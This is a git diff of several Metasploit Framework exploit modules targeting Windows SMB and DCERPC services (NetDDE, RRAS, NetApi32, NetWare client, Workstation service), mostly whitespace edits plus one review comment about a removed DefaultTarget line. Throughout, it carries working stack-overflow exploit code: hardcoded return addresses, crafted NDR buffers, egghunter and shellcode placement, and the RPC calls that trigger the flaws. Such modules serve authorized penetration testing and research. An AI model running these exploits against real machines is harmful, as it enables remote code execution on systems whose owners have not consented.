@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft NetDDE Service Overflow', 'Description' => %q{ - This module exploits a stack overflow in the NetDDE service, which is the + This module exploits a stack overflow in the NetDDE service, which is the precursor to the DCOM interface. This exploit effects only operating systems released prior to Windows XP SP1 (2000 SP4, XP SP0). Despite Microsoft's claim that this vulnerability can be exploited without authentication, the NDDEAPI @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'CVE', '2004-0206'], [ 'OSVDB', '10689'], - [ 'BID', '11372'], + [ 'BID', '11372'], [ 'MSB', 'MS04-031'], ], 
@@ -52,31 +50,32 @@ class Metasploit3 < Msf::Exploit::Remote 'Prepend' => 'A' * 8, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP4', { 'Ret' => 0x77e56f43 } ], # push esp, ret :) ], 'DefaultTarget' => 0)) + register_options( - [ + [ OptString.new('SMBPIPE', [ true, "The pipe name to use (nddeapi)", 'nddeapi']), - ], self.class) + ], self.class) end def exploit connect() smb_login() print_status("Trying target #{target.name}...") - + handle = dcerpc_handle('2f5f3220-c126-1076-b549-074d078619da', '1.2', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]) print_status("Binding to #{handle}") dcerpc_bind(handle) print_status("Bound to #{handle}") - retOverWrite = + retOverWrite = 'AA' + (NDR.long(target.ret) * 133) + payload.encoded - overflowChunk = + overflowChunk = retOverWrite + NDR.long(0xCA7CA7) + # Mew. 3 bytes enter. 1 byte null. NDR.long(0x0) diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index 4762d79938..cef78b2495 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -24,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow', 'Description' => %q{ - This module exploits a registry-based stack overflow in the Windows Routing + This module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. 
@@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook - }, + }, 'Author' => [ 'pusscat', 'hdm' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', @@ -63,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi ], 'DefaultTarget' => 0)) + register_options( [ OptString.new('SMBPIPE', [ true, "Rawr.", 'router']), 
@@ -108,64 +107,64 @@ class Metasploit3 < Msf::Exploit::Remote # Overwrite the SEH ptr, even though ESP is smashed # The handle after the ret must be an invalid address - pat = + pat = (fil * 886) + NDR.long(target.ret) + (fil * 3) + "\xc0" + bof - type2 = + type2 = NDR.string( (fil * 1024) + "\x00" ) + NDR.string( pat + "\x00" ) + NDR.string( (fil * 4096) + "\x00" ) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) - type1 = - NDR.long(rand(0xffffffff)) + # OperatorDial - NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber - NDR.long(rand(0xffffffff)) + # UseLocation - NDR.long(rand(0xffffffff)) + # ShowLights - NDR.long(rand(0xffffffff)) + # ShowConnectStatus - NDR.long(rand(0xffffffff)) + # CloseOnDial - NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits - NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits - NDR.long(rand(0xffffffff)) + # SkipConnectComplete - NDR.long(rand(0xffffffff)) + # NewEntryWizard - NDR.long(rand(0xffffffff)) + # RedialAttempts - NDR.long(rand(0xffffffff)) + # RedialSeconds - NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds - NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure - NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing - NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery - NDR.long(rand(0xffffffff)) + # CallbackMode + type1 = + NDR.long(rand(0xffffffff)) + # OperatorDial + NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber + NDR.long(rand(0xffffffff)) + # UseLocation + NDR.long(rand(0xffffffff)) + # ShowLights + NDR.long(rand(0xffffffff)) + # ShowConnectStatus + NDR.long(rand(0xffffffff)) + # CloseOnDial + NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits + NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits + NDR.long(rand(0xffffffff)) + # SkipConnectComplete + NDR.long(rand(0xffffffff)) + # NewEntryWizard + NDR.long(rand(0xffffffff)) + # RedialAttempts + NDR.long(rand(0xffffffff)) + # RedialSeconds + NDR.long(rand(0xffffffff)) + # 
IdleHangUpSeconds + NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure + NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing + NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery + NDR.long(rand(0xffffffff)) + # CallbackMode - NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc - NDR.wstring("\x00" * 129) + - NDR.long(rand(0xffffffff)) + - NDR.wstring("\x00" * 520) + - NDR.wstring("\x00" * 520) + - - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - - NDR.string("\x00" * 514) + + NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc + NDR.wstring("\x00" * 129) + + NDR.long(rand(0xffffffff)) + + NDR.wstring("\x00" * 520) + + NDR.wstring("\x00" * 520) + NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + + NDR.string("\x00" * 514) + + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) stubdata = type1 + NDR.long(rand(0xffffffff)) + eggdata - print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') + print_status('Stub is ' + stubdata.length.to_s + ' bytes long.') begin print_status('Creating the malicious registry key...') diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 6eca1389e0..e474e097f6 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb 
@@ -3,33 +3,30 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::DCERPC
 include Msf::Exploit::Remote::SMB
-
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft RRAS Service Overflow',
 'Description' => %q{
- This module exploits a stack overflow in the Windows Routing and Remote
- Access Service. Since the service is hosted inside svchost.exe, a failed
+ This module exploits a stack overflow in the Windows Routing and Remote
+ Access Service. Since the service is hosted inside svchost.exe, a failed
 exploit attempt can cause other system services to fail as well. A valid
- username and password is required to exploit this flaw on Windows 2000.
+ username and password is required to exploit this flaw on Windows 2000.
 When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
 },
- 'Author' =>
+ 'Author' =>
 [
 'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
 'hdm'
@@ -41,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'CVE', '2006-2370' ],
 [ 'OSVDB', '26437' ],
 [ 'BID', '18325' ],
- [ 'MSB', 'MS06-025' ]
+ [ 'MSB', 'MS06-025' ]
 ],
 'DefaultOptions' =>
 {
@@ -55,47 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote
 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
- 'Targets' =>
+ 'Targets' =>
 [
 [ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
 [ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ],
 ],
 'DisclosureDate' => 'Jun 13 2006'))
-
+
 register_options(
 [
 OptString.new('SMBPIPE', [ true, "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
 ], self.class)
-
 end
 # Post authentication bugs are rarely useful during automation
 def autofilter
 false
 end
-
- def exploit
-
+
+ def exploit
+
 connect()
 smb_login()
 handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
-
+
 print_status("Binding to #{handle} ...")
 dcerpc_bind(handle)
 print_status("Bound to #{handle} ...")
 print_status('Getting OS...')
-
+
 # Check the remote OS name and version
 os = smb_peer_os
 pat = ''
-
+
 case os
 when /Windows 5\.0/
- pat =
+ pat =
 payload.encoded +
 "\xeb\x06" +
 rand_text_alphanumeric(2) +
@@ -109,19 +105,19 @@ class Metasploit3 < Msf::Exploit::Remote
 rand_text_alphanumeric(2) +
 [target.ret].pack('V') +
 payload.encoded
- os = 'Windows XP'
+ os = 'Windows XP'
 end
-
+
 req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
 len = req.length
- stb =
+ stb =
 NDR.long(0x20000) +
 NDR.long(len) +
- req +
+ req +
 NDR.long(len)
 print_status("Calling the vulnerable function on #{os}...")
-
+
 begin
 dcerpc.call(0x0C, stb)
 rescue Rex::Proto::DCERPC::Exceptions::NoResponse
diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb
index 98d05011ec..c87791cf8b 100644
--- a/modules/exploits/windows/smb/ms06_040_netapi.rb
+++ b/modules/exploits/windows/smb/ms06_040_netapi.rb
@@ -3,36 +3,33 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::DCERPC
 include Msf::Exploit::Remote::SMB
-
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
 'Description' => %q{
- This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function
+ This module exploits a stack overflow in the NetApi32 CanonicalizePathName() function
 using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
 other RPC calls could be used to exploit this service. This exploit will result in
 a denial of service on on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt
- will likely result in a complete reboot on Windows 2000 and the termination of all
+ will likely result in a complete reboot on Windows 2000 and the termination of all
 SMB-related services on Windows XP. The default target for this exploit should
 succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
 },
- 'Author' =>
+ 'Author' =>
 [
 'hdm'
 ],
@@ -53,26 +50,26 @@ class Metasploit3 < Msf::Exploit::Remote
 'Payload' =>
 {
 # Technically we can use more space than this, but by limiting it
- # to 370 bytes we can use the same request for all Windows SPs.
+ # to 370 bytes we can use the same request for all Windows SPs.
 'Space' => 370,
 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
 'DefaultTarget' => 0,
- 'Targets' =>
+ 'Targets' =>
 [
 [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
- [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',
+ [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',
 {
 'Offset' => 1000,
- 'Ret' => 0x00020804
- }
+ 'Ret' => 0x00020804
+ }
 ],
 [ '(wcscpy) Windows XP SP0/SP1',
 {
- 'Offset' => 612,
- 'Ret' => 0x00020804
+ 'Offset' => 612,
+ 'Ret' => 0x00020804
 }
 ],
 [ '(stack) Windows XP SP1 English',
@@ -103,11 +100,11 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
 ], self.class)
-
+
 end
- def exploit
-
+ def exploit
+
 connect()
 smb_login()
@@ -116,11 +113,11 @@ class Metasploit3 < Msf::Exploit::Remote
 when 'Windows 5.0'
 print_status("Detected a Windows 2000 target")
 target = targets[1]
-
+
 when 'Windows NT 4.0'
 print_status("Detected a Windows NT 4.0 target")
 target = targets[1]
-
+
 when 'Windows 5.1'
 begin
 smb_create("\\SRVSVC")
@@ -133,25 +130,25 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Detected a Windows XP target (unknown patch level)")
 end
 target = targets[2]
-
+
 when /Windows Server 2003 (\d+)$/
 print_status("Detected a Windows 2003 SP0 target")
 target = targets[5]
-
+
 when /Windows Server 2003 (\d+) Service Pack (\d+)/
 print_status("Windows 2003 SP#{$2} is not exploitable")
 return
-
+
 when /Samba/
 print_status("Samba is not vulnerable")
 return
-
+
 else
 print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
 return
 end
 end
-
+
 # Specific fixups for Windows NT
 case smb_peer_os()
 when 'Windows NT 4.0'
@@ -159,12 +156,12 @@ class Metasploit3 < Msf::Exploit::Remote
 datastore['SMB::pipe_write_min_size'] = 2048
 datastore['SMB::pipe_write_max_size'] = 4096
 end
-
+
 handle = dcerpc_handle(
- '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
+ '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
 )
-
+
 print_status("Binding to #{handle} ...")
 dcerpc_bind(handle)
 print_status("Bound to #{handle} ...")
@@ -182,81 +179,63 @@ class Metasploit3 < Msf::Exploit::Remote # ); # - print_status("Building the stub data...") + print_status("Building the stub data...") stub = '' case target.name # This covers NT 4.0 as well when /wcscpy.*Windows 2000/ - + code = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded - + path = code + ( [target.ret].pack('V') * 16 ) + "\x00\x00" - stub = + stub = NDR.long(rand(0xffffffff)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + NDR.long(rand(250)+1) + NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") + NDR.long(rand(250)+1) + - NDR.long(0) - - when /wcscpy.*Windows XP/ + NDR.long(0) + + when /wcscpy.*Windows XP/ path = # Payload goes first payload.encoded + - + # Padding rand_text_alphanumeric(target['Offset'] - payload.encoded.length) + - + # Land 6 bytes in to bypass garbage (XP SP0) [ target.ret + 6 ].pack('V') + - + # Padding rand_text_alphanumeric(8) + - + # Address to write our shellcode (XP SP0) [ target.ret ].pack('V') + - + # Padding rand_text_alphanumeric(32) + # Jump straight to shellcode (XP SP1) [ target.ret ].pack('V') + - + # Padding - rand_text_alphanumeric(8) + - + rand_text_alphanumeric(8) + + # Address to write our shellcode (XP SP1) [ target.ret ].pack('V') + - + # Padding rand_text_alphanumeric(32) + - + # Terminate the path "\x00\x00" - - stub = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString('') + - NDR.UnicodeConformantVaryingStringPreBuilt(path) + - NDR.long(rand(0xf0)+1) + - NDR.UnicodeConformantVaryingString('') + - NDR.long(rand(0xf0)+1) + - NDR.long(0) - - - when /stack/ - buff = rand_text_alphanumeric(800) - buff[0, payload.encoded.length] = payload.encoded - buff[ target['OffsetA'], 4 ] = [target.ret].pack('V') - buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V') - - path = "\\\x00\\\x00" + buff + "\x00\x00" - - stub = + + stub = NDR.long(rand(0xffffffff)) + 
NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingStringPreBuilt(path) + @@ -264,8 +243,26 @@ class Metasploit3 < Msf::Exploit::Remote NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xf0)+1) + NDR.long(0) - - + + + when /stack/ + buff = rand_text_alphanumeric(800) + buff[0, payload.encoded.length] = payload.encoded + buff[ target['OffsetA'], 4 ] = [target.ret].pack('V') + buff[ target['OffsetB'], 5 ] = "\xe9" + [ (target['OffsetA'] + 5) * -1 ].pack('V') + + path = "\\\x00\\\x00" + buff + "\x00\x00" + + stub = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString('') + + NDR.UnicodeConformantVaryingStringPreBuilt(path) + + NDR.long(rand(0xf0)+1) + + NDR.UnicodeConformantVaryingString('') + + NDR.long(rand(0xf0)+1) + + NDR.long(0) + + when /wcscpy.*Windows 2003/ path = # Payload goes first @@ -309,9 +306,9 @@ class Metasploit3 < Msf::Exploit::Remote NDR.long(0) end - + print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x1f, stub) dcerpc.call(0x1f, stub) diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 2f1851d7dd..2ecc4493fc 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb 
@@ -3,30 +3,28 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
-
+
 include Msf::Exploit::Remote::Egghunter
 include Msf::Exploit::Remote::DCERPC
 include Msf::Exploit::Remote::SMB
-
+
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft Services MS06-066 nwapi32.dll',
 'Description' => %q{
- This module exploits a stack overflow in the svchost service, when the netware
- client service is running. This specific vulnerability is in the nwapi32.dll module.
+ This module exploits a stack overflow in the svchost service, when the netware
+ client service is running. This specific vulnerability is in the nwapi32.dll module.
 },
 'Author' => [ 'pusscat' ],
 'License' => MSF_LICENSE,
@@ -48,31 +46,29 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'Space' => 296,
 'BadChars' => "",
- 'Compat' =>
+ 'Compat' =>
 {
 # -ws2ord XXX?
 },
 'StackAdjustment' => -3500,
 },
 'Platform' => 'win',
- 'Targets' =>
+ 'Targets' =>
 [
- [
+ [
 'Windows XP SP2',
 {
 'Ret' => 0x00EBEEEC ,
 },
 ]
 ],
- 'DefaultTarget' => 0,
 'DisclosureDate' => 'Nov 14 2006'))
-
+
 register_options(
 [
 OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'srvsvc']),
 ], self.class)
-
 end
 def exploit
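Review bot: The `@@ -48,31 +46,29 @@` hunk drops `'DefaultTarget' => 0,` outright, which is the one change in this file that is not whitespace, and the sibling ms06_066_nwwks module in the same commit keeps its `'DefaultTarget' => 0`. With a single target this is harmless only if the framework falls back to index 0 when the key is absent; I believe it does, but that is inferred from convention rather than anything visible in the hunk. If the removal is deliberate, a word in the commit message would stop the next reader from treating it as an accidental deletion; otherwise restore the line `'DefaultTarget' => 0,` directly above `'DisclosureDate' => 'Nov 14 2006'))` so the two MS06-066 modules stay consistent. The enclosing `initialize` body starts before this hunk.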
@@ -84,34 +80,31 @@ class Metasploit3 < Msf::Exploit::Remote # Generate the egghunter payload hunter = generate_egghunter() egg = hunter[1] - #print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}") + #print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}") - # Add giant blocks of guard data before and after the egg - eggdata = + # Add giant blocks of guard data before and after the egg + eggdata = rand_text(1024) + - egg + - egg + - payload.encoded + + egg + + egg + + payload.encoded + rand_text(1024) buflen = 295 ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen-hunter[0].length) + - [ target.ret ].pack('V') + "\x00" + [ target.ret ].pack('V') + "\x00" #ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00" - stubdata = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("\\\\BBBB") + - NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! - #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.long(rand(0xffffffff)) + - #NDR.long((ofstring.length * 2) + 0xC) + - eggdata - - - - + stubdata = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString("\\\\BBBB") + + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE! + #NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.long(rand(0xffffffff)) + + #NDR.long((ofstring.length * 2) + 0xC) + + eggdata + print_status("Connecting to the SMB service...") connect() smb_login() @@ -122,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Bound to #{handle} ...") print_status("Calling the vulnerable function...") - + begin dcerpc.call(0x09, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse 
@@ -133,21 +126,21 @@ class Metasploit3 < Msf::Exploit::Remote
 else
 raise e
 end
- else
+ else
 print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
 end
 # Cleanup handler
- disconnect
-
- if (dcerpc.last_response != nil and
- dcerpc.last_response.stub_data != nil and
+ disconnect
+
+ if (dcerpc.last_response != nil and
+ dcerpc.last_response.stub_data != nil and
 dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
 return true
- else
+ else
 return false
 end
 end
-
+
 end
diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb
index 5dc0c5135f..109e18518f 100644
--- a/modules/exploits/windows/smb/ms06_066_nwwks.rb
+++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb
@@ -3,28 +3,26 @@
 ##
 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::DCERPC
 include Msf::Exploit::Remote::SMB
-
+
 def initialize(info = {})
- super(update_info(info,
+ super(update_info(info,
 'Name' => 'Microsoft Services MS06-066 nwwks.dll',
 'Description' => %q{
- This module exploits a stack overflow in the svchost service, when the netware
+ This module exploits a stack overflow in the svchost service, when the netware
 client service is running. This specific vulnerability is in the nwapi32.dll module.
 },
 'Author' => [ 'pusscat' ],
@@ -47,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 1000, 'BadChars' => "", - 'Compat' => + 'Compat' => { # -ws2ord XXX? }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ - 'Windows XP SP2', + [ + 'Windows XP SP2', { 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret }, @@ -66,35 +64,31 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 14 2006')) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'nwwks']), ], self.class) - + end def exploit # [in] [unique] wchar * # [in] [unique] wchar * # [out] long - - ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" - stubdata = - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + - NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) - - - - + ofstring = Rex::Text.to_unicode('\\\\') + rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" + stubdata = + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.long(rand(0xffffffff)) + + NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + "\x00") + + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + print_status("Connecting to the SMB service...") connect() smb_login() 
@@ -105,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("Bound to #{handle} ...")
 print_status("Calling the vulnerable function...")
-
+
 begin
 dcerpc.call(0x01, stubdata)
 rescue Rex::Proto::DCERPC::Exceptions::NoResponse
@@ -116,21 +110,21 @@ class Metasploit3 < Msf::Exploit::Remote
 else
 raise e
 end
- else
+ else
 print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")
 end
 # Cleanup handler
- disconnect
-
- if (dcerpc.last_response != nil and
- dcerpc.last_response.stub_data != nil and
+ disconnect
+
+ if (dcerpc.last_response != nil and
+ dcerpc.last_response.stub_data != nil and
 dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")
 return true
- else
+ else
 return false
 end
 end
-
+
 end
diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
index 03031ccb1c..02c448ed46 100644
--- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb
+++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb
@@ -9,10 +9,8 @@
 # http://metasploit.com/framework/
 ##
-
 require 'msf/core'
-
 class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking
@@ -20,21 +18,20 @@ class Metasploit3 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::SMB
 include Msf::Exploit::Seh
-
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Microsoft Workstation Service NetpManageIPCConnect Overflow',
 'Description' => %q{
- This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect
+ This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect
 function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.
-
- In order to exploit this vulnerability, you must specify a the name of a
+
+ In order to exploit this vulnerability, you must specify a the name of a
 valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom dns and ldap setup, however that method is not covered here.
-
- Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
+
+ Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
 credentials are required to reach the vulnerable code. Windows XP SP1 only
- requires valid user credentials. Also, testing shows that a machine already
+ requires valid user credentials. Also, testing shows that a machine already
 joined to a domain is not exploitable.
 },
 'Author' =>
@@ -87,7 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
 # NOTE: a valid domain name is required. See description.
 OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
 ], self.class)
-
 end
 def exploit
@@ -174,13 +170,13 @@ end
 The IDL for NetrJoinDomain2 looks like this:
 long _NetrJoinDomain2@28 (
- [in][unique][string] wchar_t * arg_1,
- [in][string] wchar_t * arg_2,
- [in][unique][string] wchar_t * arg_3,
- [in][unique][string] wchar_t * arg_4,
- [in][unique] struct_C * arg_5,
- [in] long arg_6
- );
+ [in][unique][string] wchar_t * arg_1,
+ [in][string] wchar_t * arg_2,
+ [in][unique][string] wchar_t * arg_3,
+ [in][unique][string] wchar_t * arg_4,
+ [in][unique] struct_C * arg_5,
+ [in] long arg_6
+ );
 1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index ffc1befeb2..38dd3bc58a 100644
